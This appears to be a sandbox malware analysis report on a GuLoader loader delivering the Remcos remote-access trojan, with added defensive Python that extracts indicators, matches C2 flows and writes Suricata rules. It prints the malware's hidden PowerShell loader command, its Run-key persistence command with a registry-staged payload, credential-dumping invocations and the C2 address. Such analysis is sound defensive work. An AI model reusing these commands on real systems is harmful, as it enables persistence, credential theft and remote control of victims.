Windows Analysis Report
SecuriteInfo.com.FileRepMalware.12793.28433.exe

Overview

General Information

Sample name: SecuriteInfo.com.FileRepMalware.12793.28433.exe
Analysis ID: 1528523
MD5: 84e09bf944042fbd418724cddb729516
SHA1: 8d908f01be478390e49bfe51fbca4959af157e1f
SHA256: 2263f87e66243b4f0d6b1bb79e0638c6556b5d89a2506ad9db5c30cc02bbdcc3
Tags: exe, GuLoader

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • SecuriteInfo.com.FileRepMalware.12793.28433.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe" MD5: 84E09BF944042FBD418724CDDB729516)
    • powershell.exe (PID: 7536 cmdline: "powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wabmig.exe (PID: 3200 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
        • cmd.exe (PID: 2596 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 2988 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • wabmig.exe (PID: 4780 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\coqd" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
        • wabmig.exe (PID: 4140 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\nivooon" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
        • wabmig.exe (PID: 4124 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\xkahpgyvtl" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Extracted Remcos configuration:
{"Host:Port:Password": "107.173.4.16:2404:1", "Assigned name": "Rem_doc2", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-DSGECX", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
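The configuration above is the most actionable artefact in the report: it names the C2 endpoint, the mutex and the persistence switches. The block below is an added example, not Joe Sandbox's extractor or Remcos code. It turns that JSON into host and network indicators, matches them against flow records constructed from the report's Suricata table, and emits a Suricata rule per C2 endpoint. Two assumptions are made: the Host:Port:Password field may carry several entries separated by "|" (a Remcos convention; this config has only one), and Remcos keeps its state under HKCU\SOFTWARE\<Mutex>, which is consistent with the exepath write to HKCU\SOFTWARE\Rmc-DSGECX recorded later in the report.

```python
r"""Indicators from the Remcos configuration above, matched against network flows.

Added example; not Joe Sandbox's extractor and not Remcos code. CONFIG is the JSON
shown in the report; FLOWS is constructed from the report's Suricata alert table.
Assumptions: '|'-separated multi-host C2 fields, and state under HKCU\SOFTWARE\<Mutex>.
"""
import json

CONFIG = json.loads(r'''{"Host:Port:Password": "107.173.4.16:2404:1", "Assigned name": "Rem_doc2", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-DSGECX", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}''')

# Constructed from the Suricata alert table in the report (timestamps, ports, peers as shown).
FLOWS = [
    {"ts": "2024-10-08T00:40:23.505863+0200", "src": "192.168.2.10", "sport": 49980, "dst": "185.26.107.57", "dport": 80, "proto": "TCP"},
    {"ts": "2024-10-08T00:40:26.595153+0200", "src": "192.168.2.10", "sport": 49982, "dst": "107.173.4.16", "dport": 2404, "proto": "TCP"},
    {"ts": "2024-10-08T00:40:27.766991+0200", "src": "192.168.2.10", "sport": 49984, "dst": "107.173.4.16", "dport": 2404, "proto": "TCP"},
    {"ts": "2024-10-08T00:40:27.786302+0200", "src": "192.168.2.10", "sport": 49983, "dst": "178.237.33.50", "dport": 80, "proto": "TCP"},
]

# Config switches that mean a Run value will be written, and the key it lands in.
RUN_KEYS = {
    "Setup HKCU\\Run": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    "Setup HKLM\\Run": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
}


def parse_c2(field: str) -> list:
    """Split 'host:port:password' entries; rsplit keeps a ':' inside a hostname intact."""
    entries = []
    for item in field.split("|"):          # assumption: '|' separates multiple C2 entries
        item = item.strip()
        if not item:
            continue
        host, port, password = item.rsplit(":", 2)
        entries.append({"host": host, "port": int(port), "password": password})
    return entries


def indicators(cfg: dict) -> dict:
    """Derive what a responder would hunt for on hosts and on the wire."""
    mutex = cfg["Mutex"]
    return {
        "c2": parse_c2(cfg["Host:Port:Password"]),
        "campaign": cfg["Assigned name"],
        "mutex": mutex,
        # Assumption: Remcos stores exepath and friends under HKCU\SOFTWARE\<mutex>
        # (the report shows a SetValue on HKCU\SOFTWARE\Rmc-DSGECX\exepath).
        "registry_keys": ["HKCU\\SOFTWARE\\" + mutex],
        "run_keys": [path for flag, path in RUN_KEYS.items() if cfg.get(flag) == "Enable"],
        # Keylog flag is "0" in this config, but the configured file name is still worth a search.
        "files": [cfg["Copy file"], cfg["Keylog file"]],
    }


def match_flows(flows: list, ind: dict) -> list:
    """Return the flows whose destination is a configured C2 endpoint."""
    c2 = {(e["host"], e["port"]) for e in ind["c2"]}
    return [f for f in flows if (f["dst"], f["dport"]) in c2]


def suricata_rules(ind: dict, base_sid: int = 9000000) -> list:
    """One alert per C2 endpoint; $HOME_NET is resolved from suricata.yaml, sid range is local."""
    rules = []
    for i, e in enumerate(ind["c2"]):
        rules.append(
            f'alert tcp $HOME_NET any -> {e["host"]} {e["port"]} '
            f'(msg:"Remcos C2 {ind["campaign"]} (analysis 1528523)"; '
            f"flow:to_server; sid:{base_sid + i}; rev:1;)"
        )
    return rules


if __name__ == "__main__":
    ind = indicators(CONFIG)
    print(json.dumps(ind, indent=2))
    for f in match_flows(FLOWS, ind):
        print("C2 flow:", f["ts"], f"{f['src']}:{f['sport']} -> {f['dst']}:{f['dport']}")
    print("\n".join(suricata_rules(ind)))
```

Only the two port-2404 flows match the configured endpoint; the two port-80 flows are the GuLoader stage download and the geoplugin lookup, which are covered by the ETPRO header-pattern alerts rather than by the config. The generated rule is deliberately IP-and-port only: the ET JA3 hash rule already fires on the Remcos TLS client fingerprint, and a content match on an encrypted session would add nothing.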
Source | Rule | Description | Author
0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000C.00000003.2460189386.000000000772A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000C.00000003.2423083446.000000000772A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000007.00000002.2408058471.000000000C4AF000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
(3 further entries not shown)

System Summary

Source: Process started
Author: Nasreddine Bencherchali (Nextron Systems)
Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wabmig.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wabmig.exe, ParentProcessId: 3200, ParentProcessName: wabmig.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", ProcessId: 2596, ProcessName: cmd.exe

Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data: Details: %Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2988, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Markedsandel

Source: Process started
Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community
Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2596, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", ProcessId: 2988, ProcessName: reg.exe

Source: File created
Author: frack113, Nasreddine Bencherchali (Nextron Systems)
Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7536, TargetFilename: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\SecuriteInfo.com.FileRepMalware.12793.28433.exe

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wabmig.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wabmig.exe, ParentProcessId: 3200, ParentProcessName: wabmig.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)", ProcessId: 2596, ProcessName: cmd.exe

Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: Command: "powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)", CommandLine: "powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe, ParentProcessId: 7260, ParentProcessName: SecuriteInfo.com.FileRepMalware.12793.28433.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)", ProcessId: 7536, ProcessName: powershell.exe
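The process tree earlier in the report and the Sigma hits above describe the same three moves: a hidden PowerShell that cuts a three-character command name out of Skeletonlike.pas at offset 54300 and invokes it on the whole file, a wabmig.exe hollowed out of that PowerShell which then spawns cmd.exe, and a Run value of type REG_EXPAND_SZ whose launcher is an environment variable and whose payload is read back from HKCU:\kompositioner\Batikker. The block below is an added example, not Joe Sandbox code and not the Sigma rules' own logic: it encodes those relationships as checks over Sysmon-style process-creation records constructed from the command lines the report shows. The parent of the initial sample (explorer.exe) is an assumption, the report does not show the script so the three characters at offset 54300 are not known here, and treating /stext as a NirSoft save-to-text switch that wabmig.exe itself does not accept is an assumption too.

```python
"""Triage of the process tree and Sigma hits above: an added example, not Joe Sandbox code.

EVENTS is hand-built from the command lines in the report (Sysmon EventID 1 field names).
The checks are modelled on the listed hits, not copied from the Sigma rules.
"""
import re
from pathlib import PureWindowsPath

# Constructed from the report's process tree; the first parent is an assumption.
EVENTS = [
    {"pid": 7260, "image": r"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"'},
    {"pid": 7536, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",
     "cmdline": r'''"powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)"'''},
    {"pid": 3200, "image": r"C:\Program Files (x86)\Windows Mail\wabmig.exe",
     "parent_image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Program Files (x86)\windows mail\wabmig.exe"'},
    {"pid": 2596, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "parent_image": r"C:\Program Files (x86)\Windows Mail\wabmig.exe",
     "cmdline": r'''"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"'''},
    {"pid": 4780, "image": r"C:\Program Files (x86)\Windows Mail\wabmig.exe",
     "parent_image": r"C:\Program Files (x86)\Windows Mail\wabmig.exe",
     "cmdline": r'"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\coqd"'},
]

INTERPRETERS = {"powershell.exe", "cmd.exe", "reg.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# REG ADD ...\CurrentVersion\Run ... /v <name> ... /t <type> ... /d "<data>"
RUN_KEY_RE = re.compile(
    r'reg\s+add\s+"?hkcu\\software\\microsoft\\windows\\currentversion\\run"?'
    r'.*?/v\s+"?(?P<name>[^"\s]+)"?.*?/t\s+(?P<type>\w+).*?/d\s+"(?P<data>.*)"\s*$', re.I)
# (Get-ItemProperty -Path '<key>').<value>  : the payload is staged in the registry
STAGING_RE = re.compile(r"Get-ItemProperty\s+-Path\s+'(?P<key>[^']+)'\)\.(?P<value>\w+)", re.I)
# Get-Content '<script>' ... .SubString(<offset>,<len>)  : command name cut out of the script
LOADER_RE = re.compile(
    r"Get-Content\s+'(?P<script>[^']+)'.*?\.SubString\((?P<offset>\d+),(?P<length>\d+)\)", re.I)


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def parse_run_key(cmdline: str):
    """Run-value name, type, %VAR% launcher and the registry location the payload is read from."""
    m = RUN_KEY_RE.search(cmdline)
    if not m:
        return None
    data = m.group("data")
    info = {"value_name": m.group("name"), "type": m.group("type").upper(),
            "launcher_env_var": None, "staging_key": None, "staging_value": None}
    env = re.match(r"%(\w+)%", data)           # launcher hidden behind an environment variable
    if env:
        info["launcher_env_var"] = env.group(1)
    s = STAGING_RE.search(data)
    if s:
        info["staging_key"], info["staging_value"] = s.group("key"), s.group("value")
    return info


def parse_loader(cmdline: str):
    """Script path and the byte range whose content is invoked as a command (not executed here)."""
    m = LOADER_RE.search(cmdline)
    if not m:
        return None
    return {"script": m.group("script"), "offset": int(m.group("offset")),
            "length": int(m.group("length")), "hidden": "-windowstyle hidden" in cmdline.lower()}


def findings(ev: dict) -> list:
    out = []
    img, parent, cmd = basename(ev["image"]), basename(ev["parent_image"]), ev["cmdline"]
    if img == "wabmig.exe" and parent in INTERPRETERS:
        out.append(f"wabmig.exe started by {parent}")
    if parent == "wabmig.exe" and img in INTERPRETERS:
        out.append(f"wabmig.exe spawned {img}")
    if img == "wabmig.exe" and "/stext" in cmd.lower():   # assumption: not a wabmig.exe option
        out.append("wabmig.exe run with /stext (NirSoft-style save-to-text switch)")
    rk = parse_run_key(cmd)
    if rk:
        out.append(f"Run value {rk['value_name']} ({rk['type']}) launches %{rk['launcher_env_var']}% "
                   f"and reads {rk['staging_key']}{rk['staging_value']}")
    ld = parse_loader(cmd)
    if ld and ld["hidden"]:
        out.append(f"hidden PowerShell invokes bytes {ld['offset']}..{ld['offset'] + ld['length']} "
                   f"of {ld['script']} as a command")
    return out


def triage(events=EVENTS) -> dict:
    """Map PID -> findings, keeping only processes that triggered at least one check."""
    return {ev["pid"]: f for ev in events if (f := findings(ev))}


if __name__ == "__main__":
    for pid, hits in triage().items():
        print(pid)
        for h in hits:
            print("  -", h)
```

The loader parser deliberately stops at reporting the offset and length: pulling those three bytes from a copy of Skeletonlike.pas with a hex viewer tells a responder what the script would have run without executing anything. The Run-value parser returns the staging key because that is where the second-stage PowerShell lives on a compromised host, and a hunt that only deletes the Run value leaves it behind.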

Stealing of Sensitive Information

Source: Registry Key set
Author: Joe Security
Data: Details: 00 21 BC BC 23 53 AF E8 95 9B EA 2A 1D D0 4A 56 FF 2F 8C 12 D6 DA 2F CC 6E 71 6C 68 29 B5 8F 45 A4 15 B1 3D F4 20 4F 66 2F 76 21 D1 DF 18 43 66 47 03 CD AD 5C C2 20 8D 8F 8B 13 7D 56 60 30 49 D5 1E F6 B2 23 6C D4 38 AE 4F 66 98 B9 7C A4 6C 1A CE FD 31 B1 4D 88 7C 4C F5 F3 3C C8 78, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wabmig.exe, ProcessId: 3200, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-DSGECX\exepath

Suricata alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T00:40:26.595153+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49982 | 107.173.4.16 | 2404 | TCP
2024-10-08T00:40:27.766991+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49984 | 107.173.4.16 | 2404 | TCP
2024-10-08T00:40:27.786302+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.10 | 49983 | 178.237.33.50 | 80 | TCP
2024-10-08T00:40:23.505863+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49980 | 185.26.107.57 | 80 | TCP


AV Detection

Source: 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "107.173.4.16:2404:1", "Assigned name": "Rem_doc2", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-DSGECX", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\SecuriteInfo.com.FileRepMalware.12793.28433.exe | ReversingLabs: Detection: 47%
Source: SecuriteInfo.com.FileRepMalware.12793.28433.exe | ReversingLabs: Detection: 47%
Source: Yara match | File source: 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.2460189386.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.2423083446.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wabmig.exe PID: 3200, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: SecuriteInfo.com.FileRepMalware.12793.28433.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 185.26.107.57:443 -> 192.168.2.10:49981 version: TLS 1.2
Source: SecuriteInfo.com.FileRepMalware.12793.28433.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: qm.Core.pdb1 | source: powershell.exe, 00000007.00000002.2404247837.0000000007602000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb | source: powershell.exe, 00000007.00000002.2404247837.0000000007602000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mation.pdb | source: powershell.exe, 00000007.00000002.2399932487.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb | source: powershell.exe, 00000007.00000002.2407709263.00000000087D7000.00000004.00000020.00020000.00000000.sdmp
